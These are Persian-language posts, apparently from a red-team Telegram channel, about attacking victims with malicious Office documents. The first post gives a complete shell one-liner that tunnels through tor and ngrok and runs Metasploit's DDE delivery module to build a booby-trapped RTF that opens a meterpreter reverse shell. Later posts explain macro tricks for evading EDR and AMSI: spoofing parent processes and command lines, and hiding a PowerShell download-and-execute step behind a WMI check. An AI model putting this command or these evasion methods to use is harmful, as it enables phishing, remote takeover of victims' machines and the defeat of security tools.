#Office #DDE_Delivery
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش

# Open terminal
root@unk9vvn:~# apt-get install -y tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use windows/fileformat/office_dde_delivery;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"

https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563#file-cactustorchddeauto-sh
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Office_Macro #Spoof #Parent_Processes and #Command_line argv
اگر در خصوص حملات #APTs تحقیقاتی کرده باشید میدانید که بسیاری از آنها بر مبنای مهندسی اجتماعی فایل فرمت هایی مانند فرمت های محصولات #Office ماکروسافت هستند، از این روی بحث رهگیری #Macro های مخرب برای محصولات #EDR بسیار مهم و حیاتی هستش، و یکی از روش های رهگیری این #Macro ها بررسی Parent های پراسس برنامه هستش، و همچنین CommandLine که در Sysmon Event سیستم عامل ثبت میشه،

یک محقق با استفاده از زبان VBA که هم پشتیبانیش برای Macro نویسی در آفیس فراهمه هم میتوان با استفاده از آن با API Windows ارتباط برقرار کرد رو مورد استفاده قرار داده و با استفاده از تابع NtQueryInformationProcess آدرس ساختمان PEB رو بدست و با استفاده از تابع WriteProcessMemory اقدام و Overwrite کردن مقادیر CommandLine کرده،

همچنین با استفاده از OpenProcess که یک تابع خنثی برای #EDR ها محصوب میشه میشه، با این کار پراسس مثلا notepad ایجاد میشود اما با اجرای یک شلکد که بد از اجرا پارامترش Overwrite با یک کد خنثی خواهد شد.

https://github.com/christophetd/spoofing-office-macro
@Unk9vvN
#Office #Macro #Malware #APTs
بسیاری از حملات سطح پیشرفته رخداده مبتنی بر Macro هایی بوده است که بصورت یک Dropper یا به عنوان یک Downloader عمل کرده و Stage های مختلف یک بد افزار رو به سیستم قربانی انتقال داده است،

اما در سالهای اخیر از پتانسیل زبان VBA به جهت دستکاری یک Process یا تزریق یک Shellcode و یا خاموش کردن مکانیزم های شناسایی کننده استفاده شده، برای مثال در این پست یک نمونه از دستکاری سطح سیستم عامل رو شاهد هستیم که میتواند مکانیزم AMSI که یک مکانیزم AV هستش رو دور زده و کد مخرب خود رو بصورت مستقیم به اجرا در بیاره!

اما جدای از این سبک استفاده از توابع سیستم عامل ویندوز، روش های دیگری در بحث مبهم سازی استفاده میشه که میتونه بواسطه ActiveX Object ها پلن بعدی حمله رو بصورت ناشناس به اجرا در بیاره،

به هر روی استفاده از Macro های خانواده Office فرصت خوبیه که سناریو های مهندسی اجتماعی قوی ای رو پیاده و عملیات تیم قرمز رو با موفقیت به سر انجام رسوند...

@Unk9vvN
#Office #Macro #Evasion
در ارائه امسال Blackhat اروپا، یک PoC مطرح شد در خصوص طراحی Macro برای اجرای کد مخرب بصورت نا محسوس.

نکته ای که محقق مبتنی بر اون روش منطق طراحی Macro خودش قراره داده، این است که بجای استفاده از یک Pattern کد معمول، سعی کرده ساختار Initialize کد برای رسیدن به نهایتا اجرای کد Powershell در تابع Shell، بصورت غیر معمول انجام بده.

یعنی معمولا برای دستیابی به اجرای کد بر روی خط فرمان، میتوان مستقیما از Wscript.Shell یک Object ساخته و مقدار مربوطه رو وارد کرد، این روش قطعا تشخیص داده خواهد شد، چرا که مقادیر Macro برای AMSI سیستم عامل ویندوز ارسال میشه و اونجا بواسطه تشخیص مبتنی بر امضا دیده خواهد شد.

محقق در کد مطرح شده خودش اومده از یک COM به نام winmgmts استفاده کرده برای زدن یک Query به Win32_PhysicalMemory که مقدار واحد RAM رو دریافت خواهد کرد، در ادامه این واحد رو جمع به خود میکنه تا در شرط در ادامه طراحی شده، مقدار dRam بیش از 20000000000 بشه تا شرط برقرار بشه.

با برقراری شرط به تابع Shell تماسی زده میشه و کد Powershell اجرا میشه مبنی بر دانلود و اجرای یک فایل EXE.

@Unk9vvN